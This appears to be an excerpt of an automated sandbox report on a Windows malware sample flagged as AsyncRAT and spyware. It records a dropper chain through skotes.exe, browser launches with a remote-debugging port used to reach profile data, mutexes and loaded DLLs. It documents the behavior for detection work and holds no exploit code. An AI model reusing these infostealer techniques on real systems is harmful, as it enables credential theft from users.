Source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: random[1].exe.25.dr	Static PE information: Section: ZLIB complexity 0.9979704181494662
Source: random[1].exe.25.dr	Static PE information: Section: bqbljxfp ZLIB complexity 0.9948254186020378
Source: 9faf801df7.exe.25.dr	Static PE information: Section: ZLIB complexity 0.9979704181494662
Source: 9faf801df7.exe.25.dr	Static PE information: Section: bqbljxfp ZLIB complexity 0.9948254186020378
Source: qk4EiZw[1].exe.25.dr	Static PE information: Section: ZLIB complexity 0.9995535714285714
Source: qk4EiZw[1].exe.25.dr	Static PE information: Section: kcsazwfy ZLIB complexity 0.9951127713295146
Source: qk4EiZw.exe.25.dr	Static PE information: Section: ZLIB complexity 0.9995535714285714
Source: qk4EiZw.exe.25.dr	Static PE information: Section: kcsazwfy ZLIB complexity 0.9951127713295146

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@47/63@7/11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CE70300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CE70300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\AVFNRIRN.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Mutant created: \Sessions\1\BaseNamedObjects\5A2EV0QwEpBhrhGH
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Documents\AAAAECGHCB.exe

File created: C:\Users\user~1\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1603331396.000000001D6D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1454151731.000000001D6E5000.00000004.00000020.00020000.00000000.sdmp, JEBKEHJJDAAAAKECBGHD.0.dr, IJDBGDGCGDAKFIDGIDBF.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1903082244.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 50%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: AAAAECGHCB.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2840,i,13733945476958162739,14775988417437195856,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2424,i,11967223973417229962,6328825183861097206,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2160,i,15529322534774427981,4503819060764799590,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\AAAAECGHCB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\AAAAECGHCB.exe "C:\Users\user\Documents\AAAAECGHCB.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe "C:\Users\user~1\AppData\Local\Temp\1012933001\qk4EiZw.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe "C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe "C:\Users\user~1\AppData\Local\Temp\1012944001\e0da62c8af.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\AAAAECGHCB.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2840,i,13733945476958162739,14775988417437195856,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2424,i,11967223973417229962,6328825183861097206,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2160,i,15529322534774427981,4503819060764799590,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\AAAAECGHCB.exe "C:\Users\user\Documents\AAAAECGHCB.exe"	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe "C:\Users\user~1\AppData\Local\Temp\1012933001\qk4EiZw.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe "C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe "C:\Users\user~1\AppData\Local\Temp\1012944001\e0da62c8af.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
